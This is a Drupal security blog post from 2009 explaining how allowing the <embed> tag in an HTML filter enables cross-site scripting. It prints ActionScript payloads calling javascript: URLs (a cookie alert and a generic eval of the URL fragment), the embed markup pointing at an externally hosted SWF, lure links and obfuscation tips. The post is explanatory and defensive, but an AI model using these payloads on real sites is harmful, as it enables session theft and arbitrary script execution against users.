Heine

  • home
  • drupal
  • drupal core commits
  • about
Home › Drupal

Using <embed> for XSS

Heine — Fri, 30/10/2009 - 18:38

I see a lot less stray <script> tags in the "Allowed HTML tags:" of the HTML filter these days. The <embed> tag is something I still see a lot in misconfigured formats.

It's rather easy to exploit such formats to execute JavaScript with a little bit of ActionScript:

class Main
{
  static function main(){  
    getURL('javascript:alert(document.cookie)');    
  }
}

Build with an ActionScript 2 compiler (eg Flex SDK), upload to a convenient location *), then make a post on the site that was so careless to allow the <embed> tag:

<embed width="0" height="0" src="http://convenient-location.example.com/XSS.swf" AllowScriptAccess="always"></embed>
Excellent article, it's pleasure to read your blog ?
<a href="http://example.com/fxxgg">FOREX</a>

Now all you have to do is lead the victim to this URL:

<a href="http://victims-site.example.com/your_swf_post">Spam on the forum</a>

If you can't be bothered to change your swf file all the time, you can attempt to create a generic XSS attack that fetches JS from the URL fragment:

class Main
{
  static function main(){  
    getURL('javascript:eval(document.location.hash.substr(1))');    
  }
}

The victim now has to visit (use a URL shortener for maximum obfuscation):

<a href="http://victims-site.example.com/your_swf_post#alert('another boring alert')">Spam on the forum</a>

That's it folks. Moral of the story: don't allow <embed> use in the HTML filter. If you need to embed videos, employ one of the modules that insert videos from trusted sources and prevent script interaction.

*) Bonus points if you upload the swf to another misconfigured Drupal site! Hint:

"Only files with the following extensions may be uploaded" swf

Average: 4.3 (3 votes)
  • Drupal
  • Input Format
  • Planet Drupal
  • Security

Thanks Heine, I've often

dalin (not verified) — Sun, 01/11/2009 - 13:27

Thanks Heine, I've often tried to find the details of why embed was dangerous but could never find it.

  • reply

Post new comment

I reserve the right to edit any comment submitted to the site. If your comment contains flaming, advertisements, or simply too many spelling errors (leet speak), it may never appear.
The content of this field is kept private and will not be shown publicly.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Allowed HTML tags: <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd> <blockquote>
  • Lines and paragraphs break automatically.
  • You can enable syntax highlighting of source code with the following tags: <code>, <blockcode>, <as>, <as3>, <csharp>, <diff>, <drupal5>, <drupal6>, <html>, <js>, <mysql>, <php>, <phpbrief>, <python>, <sql>, <plain>, <xml>. Beside the tag style "<foo>" it is also possible to use "[foo]". PHP source code can also be enclosed in <?php ... ?> or <% ... %>.

More information about formatting options

Recent posts

  • The Joomlafication of the Dutch-speaking community
  • Upgraded from 6.14 to 6.15, but Drupal still thinks it's 6.14?
  • Google Friendconnect Drupal module not recommended (yet)
  • The OpenID 2.0 Compliance Crusade - Part I
  • Using <embed> for XSS
more

Security reviews

  • Afraid custom code makes your site vulnerable?
  • You don't really trust that module you just downloaded from Drupal.org?

Sleep better after a security review.

Tags

Captcha CSRF DOH! Drupal embed Input Format modx OpenID Performance Planet Drupal Security Varnish
more tags
  • home
  • drupal
  • drupal core commits
  • about

Copyright © 2010 by Heine Deelstra. All rights reserved.